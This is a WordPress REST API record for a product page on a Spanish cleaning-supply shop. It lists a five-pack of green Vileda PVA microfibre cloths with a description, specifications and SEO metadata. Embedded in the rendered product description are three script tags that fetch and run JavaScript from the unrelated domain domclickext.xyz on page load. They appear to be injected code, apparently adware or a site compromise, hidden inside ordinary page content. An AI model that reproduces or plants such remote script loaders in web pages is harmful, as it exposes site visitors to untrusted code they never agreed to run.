{"id":10413,"date":"2019-09-11T15:22:43","date_gmt":"2019-09-11T14:22:43","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=10413"},"modified":"2019-10-30T11:44:02","modified_gmt":"2019-10-30T11:44:02","slug":"pack-5-ud-bayetas-pva-micro-verde-vileda","status":"publish","type":"product","link":"https:\/\/meprolim.es\/fr\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas-fr\/bayetas-microfibra-bayetas-fr-2\/bayeta-pva-fr-2\/pack-5-ud-bayetas-pva-micro-verde-vileda\/","title":{"rendered":"PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA &#8211; C\u00d3DIGO: FT1062"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p>Su estructura en 3D de bayeta tejida formada 100% por microfibras, ofrece una gran capacidad de limpieza, y el volumen para retirar la suciedad. Su recubrimiento \u00fanico de PVA (polivinilo de alcohol) reduce la fricci\u00f3n e incrementa su capacidad de absorci\u00f3n cuando se necesita trabajar con mucha agua, y bien escurrida deja la superficie seca y sin rastros.<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_978567746&amp;key=212b3d4039ab5319ec&amp;cv=1570621273&amp;t=1570621273799\" type=\"text\/javascript\"><\/script> <script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_469402000&amp;key=212b3d4039ab5319ec&amp;cv=315362&amp;t=1570621273799\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>\u2022 Eficaces para la eliminaci\u00f3n de polvo y grasa.<\/p>\n<p>\u2022 Se pueden emplear en seco o mojado.<\/p>\n<p>\u2022 Arrastran m\u00e1s suciedad que una bayeta convencional.<\/p>\n<p>\u2022 No da\u00f1an las superficies.<\/p>\n<p>\u2022 Lavables, hasta temperaturas de 95\u00ba C.<\/p>\n<p>\u2022 Disponibles en cuatro colores para la norma APPCC.<\/p>\n<p>\u2022 Composici\u00f3n: 80% poli\u00e9ster y 20% poliamida.<\/p>\n<p>\u2022 Tejida en m\u00e1quina circular.<\/p>\n<p>\u2022Tejido en rizo.<\/p>\n<p>\u2022 320 g\/m2.<\/p>\n<p>\u2022 40 x 40 cm.<\/p>\n<p>\u2022 Pack 5 bayetas.<\/p>\n<p>\u2022 Caja 70 bayetas.<\/p>\n<p>\u2022 Color verde.<\/p>\n<p><strong>SKU: FT1062<\/strong><\/p>\n","protected":false},"featured_media":10414,"template":"","meta":[],"product_brand":[],"product_cat":[1077,1069,1070,102],"product_tag":[921],"class_list":{"0":"post-10413","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-bayeta-pva","7":"product_cat-bayetas","8":"product_cat-bayetas-microfibra-bayetas","9":"product_cat-carros-de-servicio-fregado-manual-y-articulos-de-limpieza","10":"product_tag-bayetas-microfibra","12":"first","13":"instock","14":"shipping-taxable","15":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA - C\u00d3DIGO: FT1062 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA - C\u00d3DIGO: FT1062 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"\u2022 Eficaces para la eliminaci\u00f3n de polvo y grasa. \u2022 Se pueden emplear en seco o mojado. \u2022 Arrastran m\u00e1s suciedad que una bayeta convencional. \u2022 No da\u00f1an las superficies. \u2022 Lavables, hasta temperaturas de 95\u00ba C. \u2022 Disponibles en cuatro colores para la norma APPCC. \u2022 Composici\u00f3n: 80% poli\u00e9ster y 20% poliamida. \u2022 Tejida en m\u00e1quina circular. \u2022Tejido en rizo. \u2022 320 g\/m2. \u2022 40 x 40 cm. \u2022 Pack 5 bayetas. \u2022 Caja 70 bayetas. \u2022 Color verde. SKU: FT1062\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2019-10-30T11:44:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1062.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/bayeta-pva\\\/pack-5-ud-bayetas-pva-micro-verde-vileda\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/bayeta-pva\\\/pack-5-ud-bayetas-pva-micro-verde-vileda\\\/\",\"name\":\"PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA - C\u00d3DIGO: FT1062 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/bayeta-pva\\\/pack-5-ud-bayetas-pva-micro-verde-vileda\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/bayeta-pva\\\/pack-5-ud-bayetas-pva-micro-verde-vileda\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FT1062.jpg\",\"datePublished\":\"2019-09-11T14:22:43+00:00\",\"dateModified\":\"2019-10-30T11:44:02+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/bayeta-pva\\\/pack-5-ud-bayetas-pva-micro-verde-vileda\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/bayeta-pva\\\/pack-5-ud-bayetas-pva-micro-verde-vileda\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/bayeta-pva\\\/pack-5-ud-bayetas-pva-micro-verde-vileda\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FT1062.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FT1062.jpg\",\"width\":768,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/bayeta-pva\\\/pack-5-ud-bayetas-pva-micro-verde-vileda\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Catalogue\",\"item\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/catalogue\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA &#8211; C\u00d3DIGO: FT1062\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA - C\u00d3DIGO: FT1062 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/","og_locale":"fr_FR","og_type":"article","og_title":"PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA - C\u00d3DIGO: FT1062 - Meprolim","og_description":"\u2022 Eficaces para la eliminaci\u00f3n de polvo y grasa. \u2022 Se pueden emplear en seco o mojado. \u2022 Arrastran m\u00e1s suciedad que una bayeta convencional. \u2022 No da\u00f1an las superficies. \u2022 Lavables, hasta temperaturas de 95\u00ba C. \u2022 Disponibles en cuatro colores para la norma APPCC. \u2022 Composici\u00f3n: 80% poli\u00e9ster y 20% poliamida. \u2022 Tejida en m\u00e1quina circular. \u2022Tejido en rizo. \u2022 320 g\/m2. \u2022 40 x 40 cm. \u2022 Pack 5 bayetas. \u2022 Caja 70 bayetas. \u2022 Color verde. SKU: FT1062","og_url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/","og_site_name":"Meprolim","article_modified_time":"2019-10-30T11:44:02+00:00","og_image":[{"width":768,"height":768,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1062.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/","url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/","name":"PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA - C\u00d3DIGO: FT1062 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1062.jpg","datePublished":"2019-09-11T14:22:43+00:00","dateModified":"2019-10-30T11:44:02+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1062.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1062.jpg","width":768,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/bayeta-pva\/pack-5-ud-bayetas-pva-micro-verde-vileda\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/fr\/"},{"@type":"ListItem","position":2,"name":"Catalogue","item":"https:\/\/meprolim.es\/fr\/catalogue\/"},{"@type":"ListItem","position":3,"name":"PACK 5 UD. BAYETAS PVA MICRO VERDE VILEDA &#8211; C\u00d3DIGO: FT1062"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product\/10413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/media\/10414"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/media?parent=10413"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_brand?post=10413"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_cat?post=10413"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_tag?post=10413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}